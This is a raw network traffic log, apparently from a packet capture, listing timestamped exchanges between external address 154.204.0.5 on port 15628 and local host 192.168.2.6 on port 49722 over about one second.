Jul 20, 2024 16:31:50.236215115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.236279964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.241549015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.241604090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.246694088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.246769905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.252017021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.252084017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.257550955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.257602930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.262828112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.262887001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.267963886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.268024921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.273091078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.273190022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.278264999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.278326988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.283313036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.283363104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.288810015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.288876057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.293991089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.294038057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.299040079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.310528994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.315844059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.315905094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.320959091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.321027040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.326261997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.326317072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.331192017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.331243038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.337575912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.337624073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.353173971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.353240013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.358923912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.358987093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.364414930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.364465952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.373248100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.373305082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.379462004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.379781008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.385458946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.385529995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.391375065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.391458035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.396368027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.396447897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.401730061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.401799917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.406718969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.406785011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.412118912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.412180901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.420671940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.420758963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.426314116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.426392078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.431406975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.431467056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.436992884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.437061071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.442007065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.442074060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.447084904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.447149038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.452383041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.452446938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.457427979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.457530022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.462445974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.462522984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.467427969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.467569113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.472579956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.472635031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.480524063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.480688095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.486345053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.486406088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.491816044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.491892099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.496851921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.496928930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.502931118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.503781080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.509149075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.511682987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.517354012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.519989967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.525471926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.525573015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.530548096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.530854940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.535934925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.539735079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.544905901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.548021078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.553128958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.555736065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.560818911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.563945055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.569204092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.571825027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.576864958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.579946995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.585289001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.588038921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.592972994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.595876932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.600935936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.603796005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.608799934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.611946106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.617144108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.619694948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.626209021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.627804041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.633502007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.639586926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.647351027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.647470951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.653120995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.656440020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.663940907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.667658091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.673672915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.675667048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.680851936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.683789015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.692992926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.695864916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.710549116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.713635921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.719541073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.720133066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.725485086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.727674007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.733062029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.735845089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.743705034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.747865915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.752942085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.756150007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.761348009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.763712883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.770616055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.772209883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.777348995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.779792070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.786282063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.788178921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.794532061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.795075893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.804527044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.807729006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.812845945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.816513062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.828629017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.832091093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.837091923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.839677095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.844835997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.848212004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.853447914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.855941057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.861490965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.864155054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.869477987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.871831894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.878550053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.880187988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.886867046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.888659954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.893979073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.896086931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.903700113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.908411980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.913784027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.914007902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.919648886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.924248934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.929260015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.929660082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.934786081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.934875011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.941731930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.941843987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.947731972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.948050022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.953278065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.953598976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.958751917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.964523077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.970671892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.970793962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.976262093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.976366043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.981484890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.982191086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.991750002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.992327929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.997947931 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.999563932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.006148100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.006273985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.011686087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.012507915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.017558098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.017812967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.022779942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.022994995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.027968884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.032217026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.037462950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.037583113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.044249058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.044383049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.052776098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.052880049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.059068918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.059205055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.064387083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.064722061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.070475101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.070568085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.075500011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.075887918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.080873013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.080946922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.086045027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.086215019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.092518091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.092605114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.100038052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.100518942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.105546951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.105768919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.110805035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.110970020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.115871906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.116054058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.120985985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.121223927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.126152992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.126416922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.148499966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.150616884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.156747103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.158620119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.164535046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.164907932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.170026064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.170201063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.175581932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.176062107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.182609081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.182724953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.187829971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.188044071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.193248987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.193382978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.198761940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.198920012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.204538107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.205666065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.210927963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.211101055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.216701031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.216872931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.221887112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.222320080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.227425098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.228033066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.233114004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.236646891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.242007017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.242185116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.247303009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.247509956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.252598047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.255947113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.260905027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.264509916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.269572973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.272053003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.277280092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.280502081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.285442114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.287872076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.294754028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.296725988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.303951025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.308309078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.313189030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.313770056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.319123030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.320580006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.325603008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.325825930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.334470987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.336551905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.345072985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.345458031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.350684881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.351721048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.362085104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.363982916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.368885040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.369446039 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.374932051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.377726078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.382646084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.385565042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.391119957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.393620968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.402894974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.405661106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.410758018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.413570881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:51.418797016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:51.421624899 CEST	49722	15628	192.168.2.6	154.204.0.5
